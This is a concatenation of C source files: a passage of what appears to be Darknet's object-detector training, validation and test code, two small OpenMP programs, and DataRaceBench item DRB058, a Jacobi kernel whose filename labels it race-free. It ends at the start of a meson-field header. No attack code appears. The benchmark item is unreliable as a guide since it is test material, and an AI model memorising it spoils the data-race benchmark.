nets[i] = load_network(cfgfile, weightfile, clear);
nets[i]->learning_rate *= ngpus;
}
srand(time(0));
network *net = nets[0];
int imgs = net->batch * net->subdivisions * ngpus;
printf("Learning Rate: %g, Momentum: %g, Decay: %g\n", net->learning_rate, net->momentum, net->decay);
data train, buffer;
layer l = net->layers[net->n - 1];
int classes = l.classes;
float jitter = l.jitter;
list *plist = get_paths(train_images);
//int N = plist->size;
char **paths = (char **)list_to_array(plist);
load_args args = get_base_args(net);
args.coords = l.coords;
args.paths = paths;
args.n = imgs;
args.m = plist->size;
args.classes = classes;
args.jitter = jitter;
args.num_boxes = l.max_boxes;
args.d = &buffer;
args.type = DETECTION_DATA;
//args.type = INSTANCE_DATA;
args.threads = 64;
pthread_t load_thread = load_data(args);
double time;
int count = 0;
//while(i*imgs < N*120){
while(get_current_batch(net) < net->max_batches){
if(l.random && count++%10 == 0){
printf("Resizing\n");
int dim = (rand() % 10 + 21) * 32;
if (get_current_batch(net)+200 > net->max_batches) dim = 960;
/* dim = 960; */
printf("%d\n", dim);
args.w = dim;
args.h = dim;
pthread_join(load_thread, 0);
train = buffer;
free_data(train);
load_thread = load_data(args);
#pragma omp parallel for
for(i = 0; i < ngpus; ++i){
resize_network(nets[i], dim, dim);
}
net = nets[0];
}
time=what_time_is_it_now();
pthread_join(load_thread, 0);
train = buffer;
load_thread = load_data(args);
/*
int k;
for(k = 0; k < l.max_boxes; ++k){
box b = float_to_box(train.y.vals[10] + 1 + k*5);
if(!b.x) break;
printf("loaded: %f %f %f %f\n", b.x, b.y, b.w, b.h);
}
*/
/*
int zz;
for(zz = 0; zz < train.X.cols; ++zz){
image im = float_to_image(net->w, net->h, 3, train.X.vals[zz]);
int k;
for(k = 0; k < l.max_boxes; ++k){
box b = float_to_box(train.y.vals[zz] + k*5, 1);
printf("%f %f %f %f\n", b.x, b.y, b.w, b.h);
draw_bbox(im, b, 1, 1,0,0);
}
show_image(im, "truth11");
cvWaitKey(0);
save_image(im, "truth11");
}
*/
printf("Loaded: %lf seconds\n", what_time_is_it_now()-time);
time=what_time_is_it_now();
float loss = 0;
#ifdef GPU
if(ngpus == 1){
loss = train_network(net, train);
} else {
loss = train_networks(nets, ngpus, train, 4);
}
#else
loss = train_network(net, train);
#endif
if (avg_loss < 0) avg_loss = loss;
avg_loss = avg_loss*.9 + loss*.1;
i = get_current_batch(net);
printf("%ld: %f, %f avg, %f rate, %lf seconds, %d images\n", get_current_batch(net), loss, avg_loss, get_current_rate(net), what_time_is_it_now()-time, i*imgs);
if(i%100==0){
#ifdef GPU
if(ngpus != 1) sync_nets(nets, ngpus, 0);
#endif
char buff[256];
sprintf(buff, "%s/%s.backup", backup_directory, base);
save_weights(net, buff);
}
if(i%10000==0 || (i < 1000 && i%100 == 0)){
#ifdef GPU
if(ngpus != 1) sync_nets(nets, ngpus, 0);
#endif
char buff[256];
sprintf(buff, "%s/%s_%d.weights", backup_directory, base, i);
save_weights(net, buff);
}
free_data(train);
}
#ifdef GPU
if(ngpus != 1) sync_nets(nets, ngpus, 0);
#endif
char buff[256];
sprintf(buff, "%s/%s_final.weights", backup_directory, base);
save_weights(net, buff);
}
static int get_coco_image_id(char *filename)
{
char *p = strrchr(filename, '/');
char *c = strrchr(filename, '_');
if(c) p = c;
return atoi(p+1);
}
static void print_cocos(FILE *fp, char *image_path, detection *dets, int num_boxes, int classes, int w, int h)
{
int i, j;
int image_id = get_coco_image_id(image_path);
for(i = 0; i < num_boxes; ++i){
float xmin = dets[i].bbox.x - dets[i].bbox.w/2.;
float xmax = dets[i].bbox.x + dets[i].bbox.w/2.;
float ymin = dets[i].bbox.y - dets[i].bbox.h/2.;
float ymax = dets[i].bbox.y + dets[i].bbox.h/2.;
if (xmin < 0) xmin = 0;
if (ymin < 0) ymin = 0;
if (xmax > w) xmax = w;
if (ymax > h) ymax = h;
float bx = xmin;
float by = ymin;
float bw = xmax - xmin;
float bh = ymax - ymin;
for(j = 0; j < classes; ++j){
if (dets[i].prob[j]) fprintf(fp, "{\"image_id\":%d, \"category_id\":%d, \"bbox\":[%f, %f, %f, %f], \"score\":%f},\n", image_id, coco_ids[j], bx, by, bw, bh, dets[i].prob[j]);
}
}
}
void print_detector_detections(FILE **fps, char *id, detection *dets, int total, int classes, int w, int h)
{
int i, j;
for(i = 0; i < total; ++i){
float xmin = dets[i].bbox.x - dets[i].bbox.w/2. + 1;
float xmax = dets[i].bbox.x + dets[i].bbox.w/2. + 1;
float ymin = dets[i].bbox.y - dets[i].bbox.h/2. + 1;
float ymax = dets[i].bbox.y + dets[i].bbox.h/2. + 1;
if (xmin < 1) xmin = 1;
if (ymin < 1) ymin = 1;
if (xmax > w) xmax = w;
if (ymax > h) ymax = h;
for(j = 0; j < classes; ++j){
if (dets[i].prob[j]) fprintf(fps[j], "%s %f %f %f %f %f\n", id, dets[i].prob[j],
xmin, ymin, xmax, ymax);
}
}
}
void print_imagenet_detections(FILE *fp, int id, detection *dets, int total, int classes, int w, int h)
{
int i, j;
for(i = 0; i < total; ++i){
float xmin = dets[i].bbox.x - dets[i].bbox.w/2.;
float xmax = dets[i].bbox.x + dets[i].bbox.w/2.;
float ymin = dets[i].bbox.y - dets[i].bbox.h/2.;
float ymax = dets[i].bbox.y + dets[i].bbox.h/2.;
if (xmin < 0) xmin = 0;
if (ymin < 0) ymin = 0;
if (xmax > w) xmax = w;
if (ymax > h) ymax = h;
for(j = 0; j < classes; ++j){
int class = j;
if (dets[i].prob[class]) fprintf(fp, "%d %d %f %f %f %f %f\n", id, j+1, dets[i].prob[class],
xmin, ymin, xmax, ymax);
}
}
}
void validate_detector_flip(char *datacfg, char *cfgfile, char *weightfile, char *outfile)
{
int j;
list *options = read_data_cfg(datacfg);
char *valid_images = option_find_str(options, "valid", "data/train.list");
char *name_list = option_find_str(options, "names", "data/names.list");
char *prefix = option_find_str(options, "results", "results");
char **names = get_labels(name_list);
char *mapf = option_find_str(options, "map", 0);
int *map = 0;
if (mapf) map = read_map(mapf);
network *net = load_network(cfgfile, weightfile, 0);
set_batch_network(net, 2);
fprintf(stderr, "Learning Rate: %g, Momentum: %g, Decay: %g\n", net->learning_rate, net->momentum, net->decay);
srand(time(0));
list *plist = get_paths(valid_images);
char **paths = (char **)list_to_array(plist);
layer l = net->layers[net->n-1];
int classes = l.classes;
char buff[1024];
char *type = option_find_str(options, "eval", "voc");
FILE *fp = 0;
FILE **fps = 0;
int coco = 0;
int imagenet = 0;
if(0==strcmp(type, "coco")){
if(!outfile) outfile = "coco_results";
snprintf(buff, 1024, "%s/%s.json", prefix, outfile);
fp = fopen(buff, "w");
fprintf(fp, "[\n");
coco = 1;
} else if(0==strcmp(type, "imagenet")){
if(!outfile) outfile = "imagenet-detection";
snprintf(buff, 1024, "%s/%s.txt", prefix, outfile);
fp = fopen(buff, "w");
imagenet = 1;
classes = 200;
} else {
if(!outfile) outfile = "comp4_det_test_";
fps = calloc(classes, sizeof(FILE *));
for(j = 0; j < classes; ++j){
snprintf(buff, 1024, "%s/%s%s.txt", prefix, outfile, names[j]);
fps[j] = fopen(buff, "w");
}
}
int m = plist->size;
int i=0;
int t;
float thresh = .005;
float nms = .45;
int nthreads = 4;
image *val = calloc(nthreads, sizeof(image));
image *val_resized = calloc(nthreads, sizeof(image));
image *buf = calloc(nthreads, sizeof(image));
image *buf_resized = calloc(nthreads, sizeof(image));
pthread_t *thr = calloc(nthreads, sizeof(pthread_t));
image input = make_image(net->w, net->h, net->c*2);
load_args args = {0};
args.w = net->w;
args.h = net->h;
//args.type = IMAGE_DATA;
args.type = LETTERBOX_DATA;
for(t = 0; t < nthreads; ++t){
args.path = paths[i+t];
args.im = &buf[t];
args.resized = &buf_resized[t];
thr[t] = load_data_in_thread(args);
}
double start = what_time_is_it_now();
for(i = nthreads; i < m+nthreads; i += nthreads){
fprintf(stderr, "%d\n", i);
for(t = 0; t < nthreads && i+t-nthreads < m; ++t){
pthread_join(thr[t], 0);
val[t] = buf[t];
val_resized[t] = buf_resized[t];
}
for(t = 0; t < nthreads && i+t < m; ++t){
args.path = paths[i+t];
args.im = &buf[t];
args.resized = &buf_resized[t];
thr[t] = load_data_in_thread(args);
}
for(t = 0; t < nthreads && i+t-nthreads < m; ++t){
char *path = paths[i+t-nthreads];
char *id = basecfg(path);
copy_cpu(net->w*net->h*net->c, val_resized[t].data, 1, input.data, 1);
flip_image(val_resized[t]);
copy_cpu(net->w*net->h*net->c, val_resized[t].data, 1, input.data + net->w*net->h*net->c, 1);
network_predict(net, input.data);
int w = val[t].w;
int h = val[t].h;
int num = 0;
detection *dets = get_network_boxes(net, w, h, thresh, .5, map, 0, &num);
if (nms) do_nms_sort(dets, num, classes, nms);
if (coco){
print_cocos(fp, path, dets, num, classes, w, h);
} else if (imagenet){
print_imagenet_detections(fp, i+t-nthreads+1, dets, num, classes, w, h);
} else {
print_detector_detections(fps, id, dets, num, classes, w, h);
}
free_detections(dets, num);
free(id);
free_image(val[t]);
free_image(val_resized[t]);
}
}
for(j = 0; j < classes; ++j){
if(fps) fclose(fps[j]);
}
if(coco){
fseek(fp, -2, SEEK_CUR);
fprintf(fp, "\n]\n");
fclose(fp);
}
fprintf(stderr, "Total Detection Time: %f Seconds\n", what_time_is_it_now() - start);
}
void validate_detector(char *datacfg, char *cfgfile, char *weightfile, char *outfile)
{
int j;
list *options = read_data_cfg(datacfg);
char *valid_images = option_find_str(options, "valid", "data/train.list");
char *name_list = option_find_str(options, "names", "data/names.list");
char *prefix = option_find_str(options, "results", "results");
char **names = get_labels(name_list);
char *mapf = option_find_str(options, "map", 0);
int *map = 0;
if (mapf) map = read_map(mapf);
network *net = load_network(cfgfile, weightfile, 0);
set_batch_network(net, 1);
fprintf(stderr, "Learning Rate: %g, Momentum: %g, Decay: %g\n", net->learning_rate, net->momentum, net->decay);
srand(time(0));
list *plist = get_paths(valid_images);
char **paths = (char **)list_to_array(plist);
layer l = net->layers[net->n-1];
int classes = l.classes;
char buff[1024];
char *type = option_find_str(options, "eval", "voc");
FILE *fp = 0;
FILE **fps = 0;
int coco = 0;
int imagenet = 0;
if(0==strcmp(type, "coco")){
if(!outfile) outfile = "coco_results";
snprintf(buff, 1024, "%s/%s.json", prefix, outfile);
fp = fopen(buff, "w");
fprintf(fp, "[\n");
coco = 1;
} else if(0==strcmp(type, "imagenet")){
if(!outfile) outfile = "imagenet-detection";
snprintf(buff, 1024, "%s/%s.txt", prefix, outfile);
fp = fopen(buff, "w");
imagenet = 1;
classes = 200;
} else {
if(!outfile) outfile = "comp4_det_test_";
fps = calloc(classes, sizeof(FILE *));
for(j = 0; j < classes; ++j){
snprintf(buff, 1024, "%s/%s%s.txt", prefix, outfile, names[j]);
fps[j] = fopen(buff, "w");
}
}
int m = plist->size;
int i=0;
int t;
float thresh = .005;
float nms = .45;
int nthreads = 4;
image *val = calloc(nthreads, sizeof(image));
image *val_resized = calloc(nthreads, sizeof(image));
image *buf = calloc(nthreads, sizeof(image));
image *buf_resized = calloc(nthreads, sizeof(image));
pthread_t *thr = calloc(nthreads, sizeof(pthread_t));
load_args args = {0};
args.w = net->w;
args.h = net->h;
//args.type = IMAGE_DATA;
args.type = LETTERBOX_DATA;
for(t = 0; t < nthreads; ++t){
args.path = paths[i+t];
args.im = &buf[t];
args.resized = &buf_resized[t];
thr[t] = load_data_in_thread(args);
}
double start = what_time_is_it_now();
for(i = nthreads; i < m+nthreads; i += nthreads){
fprintf(stderr, "%d\n", i);
for(t = 0; t < nthreads && i+t-nthreads < m; ++t){
pthread_join(thr[t], 0);
val[t] = buf[t];
val_resized[t] = buf_resized[t];
}
for(t = 0; t < nthreads && i+t < m; ++t){
args.path = paths[i+t];
args.im = &buf[t];
args.resized = &buf_resized[t];
thr[t] = load_data_in_thread(args);
}
for(t = 0; t < nthreads && i+t-nthreads < m; ++t){
char *path = paths[i+t-nthreads];
char *id = basecfg(path);
float *X = val_resized[t].data;
network_predict(net, X);
int w = val[t].w;
int h = val[t].h;
int nboxes = 0;
detection *dets = get_network_boxes(net, w, h, thresh, .5, map, 0, &nboxes);
if (nms) do_nms_sort(dets, nboxes, classes, nms);
if (coco){
print_cocos(fp, path, dets, nboxes, classes, w, h);
} else if (imagenet){
print_imagenet_detections(fp, i+t-nthreads+1, dets, nboxes, classes, w, h);
} else {
print_detector_detections(fps, id, dets, nboxes, classes, w, h);
}
free_detections(dets, nboxes);
free(id);
free_image(val[t]);
free_image(val_resized[t]);
}
}
for(j = 0; j < classes; ++j){
if(fps) fclose(fps[j]);
}
if(coco){
fseek(fp, -2, SEEK_CUR);
fprintf(fp, "\n]\n");
fclose(fp);
}
fprintf(stderr, "Total Detection Time: %f Seconds\n", what_time_is_it_now() - start);
}
void validate_detector_recall(char *cfgfile, char *weightfile)
{
network *net = load_network(cfgfile, weightfile, 0);
set_batch_network(net, 1);
fprintf(stderr, "Learning Rate: %g, Momentum: %g, Decay: %g\n", net->learning_rate, net->momentum, net->decay);
srand(time(0));
list *plist = get_paths("data/coco_val_5k.list");
char **paths = (char **)list_to_array(plist);
layer l = net->layers[net->n-1];
int j, k;
int m = plist->size;
int i=0;
float thresh = .001;
float iou_thresh = .5;
float nms = .4;
int total = 0;
int correct = 0;
int proposals = 0;
float avg_iou = 0;
for(i = 0; i < m; ++i){
char *path = paths[i];
image orig = load_image_color(path, 0, 0);
image sized = resize_image(orig, net->w, net->h);
char *id = basecfg(path);
network_predict(net, sized.data);
int nboxes = 0;
detection *dets = get_network_boxes(net, sized.w, sized.h, thresh, .5, 0, 1, &nboxes);
if (nms) do_nms_obj(dets, nboxes, 1, nms);
char labelpath[4096];
find_replace(path, "images", "labels", labelpath);
find_replace(labelpath, "JPEGImages", "labels", labelpath);
find_replace(labelpath, ".jpg", ".txt", labelpath);
find_replace(labelpath, ".JPEG", ".txt", labelpath);
int num_labels = 0;
box_label *truth = read_boxes(labelpath, &num_labels);
for(k = 0; k < nboxes; ++k){
if(dets[k].objectness > thresh){
++proposals;
}
}
for (j = 0; j < num_labels; ++j) {
++total;
box t = {truth[j].x, truth[j].y, truth[j].w, truth[j].h};
float best_iou = 0;
for(k = 0; k < l.w*l.h*l.n; ++k){
float iou = box_iou(dets[k].bbox, t);
if(dets[k].objectness > thresh && iou > best_iou){
best_iou = iou;
}
}
avg_iou += best_iou;
if(best_iou > iou_thresh){
++correct;
}
}
fprintf(stderr, "%5d %5d %5d\tRPs/Img: %.2f\tIOU: %.2f%%\tRecall:%.2f%%\n", i, correct, total, (float)proposals/(i+1), avg_iou*100/total, 100.*correct/total);
free(id);
free_image(orig);
free_image(sized);
}
}
void test_detector(char *datacfg, char *cfgfile, char *weightfile, char *filename, float thresh, float hier_thresh, char *outfile, int fullscreen)
{
list *options = read_data_cfg(datacfg);
char *name_list = option_find_str(options, "names", "data/names.list");
char **names = get_labels(name_list);
image **alphabet = load_alphabet();
network *net = load_network(cfgfile, weightfile, 0);
set_batch_network(net, 1);
srand(2222222);
double time;
char buff[256];
char *input = buff;
float nms=.45;
while(1){
if(filename){
strncpy(input, filename, 256);
} else {
printf("Enter Image Path: ");
fflush(stdout);
input = fgets(input, 256, stdin);
if(!input) return;
strtok(input, "\n");
}
image im = load_image_color(input,0,0);
image sized = letterbox_image(im, net->w, net->h);
//image sized = resize_image(im, net->w, net->h);
//image sized2 = resize_max(im, net->w);
//image sized = crop_image(sized2, -((net->w - sized2.w)/2), -((net->h - sized2.h)/2), net->w, net->h);
//resize_network(net, sized.w, sized.h);
layer l = net->layers[net->n-1];
float *X = sized.data;
time=what_time_is_it_now();
network_predict(net, X);
printf("%s: Predicted in %f seconds.\n", input, what_time_is_it_now()-time);
int nboxes = 0;
detection *dets = get_network_boxes(net, im.w, im.h, thresh, hier_thresh, 0, 1, &nboxes);
//printf("%d\n", nboxes);
//if (nms) do_nms_obj(boxes, probs, l.w*l.h*l.n, l.classes, nms);
if (nms) do_nms_sort(dets, nboxes, l.classes, nms);
draw_detections(im, dets, nboxes, thresh, names, alphabet, l.classes);
free_detections(dets, nboxes);
if(outfile){
save_image(im, outfile);
}
else{
save_image(im, "predictions");
#ifdef OPENCV
make_window("predictions", 512, 512, 0);
show_image(im, "predictions", 0);
#endif
}
free_image(im);
free_image(sized);
if (filename) break;
}
}
/*
void censor_detector(char *datacfg, char *cfgfile, char *weightfile, int cam_index, const char *filename, int class, float thresh, int skip)
{
#ifdef OPENCV
char *base = basecfg(cfgfile);
network *net = load_network(cfgfile, weightfile, 0);
set_batch_network(net, 1);
srand(2222222);
CvCapture * cap;
int w = 1280;
int h = 720;
if(filename){
cap = cvCaptureFromFile(filename);
}else{
cap = cvCaptureFromCAM(cam_index);
}
if(w){
cvSetCaptureProperty(cap, CV_CAP_PROP_FRAME_WIDTH, w);
}
if(h){
cvSetCaptureProperty(cap, CV_CAP_PROP_FRAME_HEIGHT, h);
}
if(!cap) error("Couldn't connect to webcam.\n");
cvNamedWindow(base, CV_WINDOW_NORMAL);
cvResizeWindow(base, 512, 512);
float fps = 0;
int i;
float nms = .45;
while(1){
image in = get_image_from_stream(cap);
//image in_s = resize_image(in, net->w, net->h);
image in_s = letterbox_image(in, net->w, net->h);
layer l = net->layers[net->n-1];
float *X = in_s.data;
network_predict(net, X);
int nboxes = 0;
detection *dets = get_network_boxes(net, in.w, in.h, thresh, 0, 0, 0, &nboxes);
//if (nms) do_nms_obj(boxes, probs, l.w*l.h*l.n, l.classes, nms);
if (nms) do_nms_sort(dets, nboxes, l.classes, nms);
for(i = 0; i < nboxes; ++i){
if(dets[i].prob[class] > thresh){
box b = dets[i].bbox;
int left = b.x-b.w/2.;
int top = b.y-b.h/2.;
censor_image(in, left, top, b.w, b.h);
}
}
show_image(in, base);
cvWaitKey(10);
free_detections(dets, nboxes);
free_image(in_s);
free_image(in);
float curr = 0;
fps = .9*fps + .1*curr;
for(i = 0; i < skip; ++i){
image in = get_image_from_stream(cap);
free_image(in);
}
}
#endif
}
void extract_detector(char *datacfg, char *cfgfile, char *weightfile, int cam_index, const char *filename, int class, float thresh, int skip)
{
#ifdef OPENCV
char *base = basecfg(cfgfile);
network *net = load_network(cfgfile, weightfile, 0);
set_batch_network(net, 1);
srand(2222222);
CvCapture * cap;
int w = 1280;
int h = 720;
if(filename){
cap = cvCaptureFromFile(filename);
}else{
cap = cvCaptureFromCAM(cam_index);
}
if(w){
cvSetCaptureProperty(cap, CV_CAP_PROP_FRAME_WIDTH, w);
}
if(h){
cvSetCaptureProperty(cap, CV_CAP_PROP_FRAME_HEIGHT, h);
}
if(!cap) error("Couldn't connect to webcam.\n");
cvNamedWindow(base, CV_WINDOW_NORMAL);
cvResizeWindow(base, 512, 512);
float fps = 0;
int i;
int count = 0;
float nms = .45;
while(1){
image in = get_image_from_stream(cap);
//image in_s = resize_image(in, net->w, net->h);
image in_s = letterbox_image(in, net->w, net->h);
layer l = net->layers[net->n-1];
show_image(in, base);
int nboxes = 0;
float *X = in_s.data;
network_predict(net, X);
detection *dets = get_network_boxes(net, in.w, in.h, thresh, 0, 0, 1, &nboxes);
//if (nms) do_nms_obj(boxes, probs, l.w*l.h*l.n, l.classes, nms);
if (nms) do_nms_sort(dets, nboxes, l.classes, nms);
for(i = 0; i < nboxes; ++i){
if(dets[i].prob[class] > thresh){
box b = dets[i].bbox;
int size = b.w*in.w > b.h*in.h ? b.w*in.w : b.h*in.h;
int dx = b.x*in.w-size/2.;
int dy = b.y*in.h-size/2.;
image bim = crop_image(in, dx, dy, size, size);
char buff[2048];
sprintf(buff, "results/extract/%07d", count);
++count;
save_image(bim, buff);
free_image(bim);
}
}
free_detections(dets, nboxes);
free_image(in_s);
free_image(in);
float curr = 0;
fps = .9*fps + .1*curr;
for(i = 0; i < skip; ++i){
image in = get_image_from_stream(cap);
free_image(in);
}
}
#endif
}
*/
/*
void network_detect(network *net, image im, float thresh, float hier_thresh, float nms, detection *dets)
{
network_predict_image(net, im);
layer l = net->layers[net->n-1];
int nboxes = num_boxes(net);
fill_network_boxes(net, im.w, im.h, thresh, hier_thresh, 0, 0, dets);
if (nms) do_nms_sort(dets, nboxes, l.classes, nms);
}
*/
void run_detector(int argc, char **argv)
{
char *prefix = find_char_arg(argc, argv, "-prefix", 0);
float thresh = find_float_arg(argc, argv, "-thresh", .5);
float hier_thresh = find_float_arg(argc, argv, "-hier", .5);
int cam_index = find_int_arg(argc, argv, "-c", 0);
int frame_skip = find_int_arg(argc, argv, "-s", 0);
int avg = find_int_arg(argc, argv, "-avg", 3);
if(argc < 4){
fprintf(stderr, "usage: %s %s [train/test/valid] [cfg] [weights (optional)]\n", argv[0], argv[1]);
return;
}
char *gpu_list = find_char_arg(argc, argv, "-gpus", 0);
char *outfile = find_char_arg(argc, argv, "-out", 0);
int *gpus = 0;
int gpu = 0;
int ngpus = 0;
if(gpu_list){
printf("%s\n", gpu_list);
int len = strlen(gpu_list);
ngpus = 1;
int i;
for(i = 0; i < len; ++i){
if (gpu_list[i] == ',') ++ngpus;
}
gpus = calloc(ngpus, sizeof(int));
for(i = 0; i < ngpus; ++i){
gpus[i] = atoi(gpu_list);
gpu_list = strchr(gpu_list, ',')+1;
}
} else {
gpu = gpu_index;
gpus = &gpu;
ngpus = 1;
}
int clear = find_arg(argc, argv, "-clear");
int fullscreen = find_arg(argc, argv, "-fullscreen");
int width = find_int_arg(argc, argv, "-w", 0);
int height = find_int_arg(argc, argv, "-h", 0);
int fps = find_int_arg(argc, argv, "-fps", 0);
//int class = find_int_arg(argc, argv, "-class", 0);
char *datacfg = argv[3];
char *cfg = argv[4];
char *weights = (argc > 5) ? argv[5] : 0;
char *filename = (argc > 6) ? argv[6]: 0;
if(0==strcmp(argv[2], "test")) test_detector(datacfg, cfg, weights, filename, thresh, hier_thresh, outfile, fullscreen);
else if(0==strcmp(argv[2], "train")) train_detector(datacfg, cfg, weights, gpus, ngpus, clear);
else if(0==strcmp(argv[2], "valid")) validate_detector(datacfg, cfg, weights, outfile);
else if(0==strcmp(argv[2], "valid2")) validate_detector_flip(datacfg, cfg, weights, outfile);
else if(0==strcmp(argv[2], "recall")) validate_detector_recall(cfg, weights);
else if(0==strcmp(argv[2], "demo")) {
list *options = read_data_cfg(datacfg);
int classes = option_find_int(options, "classes", 20);
char *name_list = option_find_str(options, "names", "data/names.list");
char **names = get_labels(name_list);
demo(cfg, weights, thresh, cam_index, filename, names, classes, frame_skip, prefix, avg, hier_thresh, width, height, fps, fullscreen);
}
//else if(0==strcmp(argv[2], "extract")) extract_detector(datacfg, cfg, weights, cam_index, filename, class, thresh, frame_skip);
//else if(0==strcmp(argv[2], "censor")) censor_detector(datacfg, cfg, weights, cam_index, filename, class, thresh, frame_skip);
}
|
app_main.c | #include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "bmp_interface.h"
#include <omp.h>
extern int __htc_get_unit_count();
extern int global_radius;
int app_main(int argc, char **argv) {
uint32_t bufsize = 1000;
// Allocate target temp buffer.
extern void *stencil_cp_alloc(size_t);
uint8_t *unew = (uint8_t *)stencil_cp_alloc(bufsize * sizeof(uint8_t));
printf("unit count is %d\n", __htc_get_unit_count());
int i;
#pragma omp target
#pragma omp teams distribute parallel for num_teams(4) num_threads(8)
for (i = 0; i < bufsize; i++) {
printf("team %d thread %d i is %d\n", (int)omp_get_team_num(),
(int)omp_get_thread_num(), i);
unew[i] = omp_get_team_num() * omp_get_thread_num();
}
int sum = 0;
for (i = 0; i < bufsize; i++) {
// printf("i = %d val = %d\n", i, unew[i]);
sum += unew[i];
}
printf("sum is %d %s\n", sum, (sum == 5124) ? "PASSED" : "FAILED");
return 0;
}
|
ab-totient-omp-14.c | // Distributed and parallel technologies, Andrew Beveridge, 03/03/2014
// To Compile: gcc -Wall -O -o ab-totient-omp -fopenmp ab-totient-omp.c
// To Run / Time: /usr/bin/time -v ./ab-totient-omp range_start range_end
#include <stdio.h>
#include <omp.h>
/* When input is a prime number, the totient is simply the prime number - 1. Totient is always even (except for 1).
If n is a positive integer, then φ(n) is the number of integers k in the range 1 ≤ k ≤ n for which gcd(n, k) = 1 */
long getTotient (long number) {
long result = number;
// Check every prime number below the square root for divisibility
if(number % 2 == 0){
result -= result / 2;
do
number /= 2;
while(number %2 == 0);
}
// Primitive replacement for a list of primes, looping through every odd number
long prime;
for(prime = 3; prime * prime <= number; prime += 2){
if(number %prime == 0){
result -= result / prime;
do
number /= prime;
while(number % prime == 0);
}
}
// Last common factor
if(number > 1)
result -= result / number;
// Return the result.
return result;
}
// Main method.
int main(int argc, char ** argv) {
// Load inputs
long lower, upper;
sscanf(argv[1], "%ld", &lower);
sscanf(argv[2], "%ld", &upper);
int i;
long result = 0.0;
// We know the answer if it's 1; no need to execute the function
if(lower == 1) {
result = 1.0;
lower = 2;
}
#pragma omp parallel for default(shared) private(i) schedule(auto) reduction(+:result) num_threads(14)
// Sum all totients in the specified range
for (i = lower; i <= upper; i++) {
result = result + getTotient(i);
}
// Print the result
printf("Sum of Totients between [%ld..%ld] is %ld \n", lower, upper, result);
// A-OK!
return 0;
}
|
DRB058-jacobikernel-orig-no.c | /*
Copyright (c) 2017, Lawrence Livermore National Security, LLC.
Produced at the Lawrence Livermore National Laboratory
Written by Chunhua Liao, Pei-Hung Lin, Joshua Asplund,
Markus Schordan, and Ian Karlin
(email: liao6@llnl.gov, lin32@llnl.gov, asplund1@llnl.gov,
schordan1@llnl.gov, karlin1@llnl.gov)
LLNL-CODE-732144
All rights reserved.
This file is part of DataRaceBench. For details, see
https://github.com/LLNL/dataracebench. Please also see the LICENSE file
for our additional BSD notice.
Redistribution and use in source and binary forms, with
or without modification, are permitted provided that the following
conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the disclaimer below.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the disclaimer (as noted below)
in the documentation and/or other materials provided with the
distribution.
* Neither the name of the LLNS/LLNL nor the names of its contributors
may be used to endorse or promote products derived from this
software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL LAWRENCE LIVERMORE NATIONAL
SECURITY, LLC, THE U.S. DEPARTMENT OF ENERGY OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
THE POSSIBILITY OF SUCH DAMAGE.
*/
/*
Two parallel for loops within one single parallel region,
combined with private() and reduction().
*/
#include <stdio.h>
#include <math.h>
#define MSIZE 200
int n=MSIZE, m=MSIZE, mits=1000;
double tol=0.0000000001, relax = 1.0, alpha = 0.0543;
double u[MSIZE][MSIZE], f[MSIZE][MSIZE], uold[MSIZE][MSIZE];
double dx, dy;
void
initialize ()
{
int i, j, xx, yy;
dx = 2.0 / (n - 1);
dy = 2.0 / (m - 1);
/* Initialize initial condition and RHS */
//#pragma omp parallel for private(i,j,xx,yy)
#pragma omp parallel for private(xx ,yy)
for (i = 0; i < n; i++)
#pragma omp parallel for private(xx ,yy)
for (j = 0; j < m; j++)
{
xx = (int) (-1.0 + dx * (i - 1)); /* -1 < x < 1 */
yy = (int) (-1.0 + dy * (j - 1)); /* -1 < y < 1 */
u[i][j] = 0.0;
f[i][j] = -1.0 * alpha * (1.0 - xx * xx) * (1.0 - yy * yy)
- 2.0 * (1.0 - xx * xx) - 2.0 * (1.0 - yy * yy);
}
}
void
jacobi ()
{
double omega;
int i, j, k;
double error, resid, ax, ay, b;
omega = relax;
/* Initialize coefficients */
dx = 2.0 / (n - 1);
dy = 2.0 / (m - 1);
ax = 1.0 / (dx * dx); /* X-direction coef */
ay = 1.0 / (dy * dy); /* Y-direction coef */
b = -2.0 / (dx * dx) - 2.0 / (dy * dy) - alpha; /* Central coeff */
error = 10.0 * tol;
k = 1;
while (k <= mits)
{
error = 0.0;
/* Copy new solution into old */
#pragma omp parallel for
for (i = 0; i < n; i++)
#pragma omp parallel for
for (j = 0; j < m; j++)
uold[i][j] = u[i][j];
#pragma omp parallel for private(resid) reduction(+:error)
for (i = 1; i < (n - 1); i++)
#pragma omp parallel for private(resid) reduction(+:error)
for (j = 1; j < (m - 1); j++)
{
resid = (ax * (uold[i - 1][j] + uold[i + 1][j])
+ ay * (uold[i][j - 1] + uold[i][j + 1]) +
b * uold[i][j] - f[i][j]) / b;
u[i][j] = uold[i][j] - omega * resid;
error = error + resid * resid;
}
/* omp end parallel */
/* Error check */
k = k + 1;
error = sqrt (error) / (n * m);
} /* End iteration loop */
printf ("Total Number of Iterations:%d\n", k);
printf ("Residual:%E\n", error);
}
int main()
{
initialize();
jacobi();
return 0;
}
|
mesonfield_compute_impl.h | //Meson field computation code
#ifndef _MESONFIELD_COMPUTE_IMPL
#define _MESONFIELD_COMPUTE_IMPL
//For all mode indices l_i and r_j, compute the meson field \sum_p l_i^\dagger(p,t) M(p,t) r_j(p,t)
//It is assumed that A2AfieldL and A2AfieldR are Fourier transformed field containers
//M(p,t) is a completely general momentum-space spin/color/flavor matrix per temporal slice
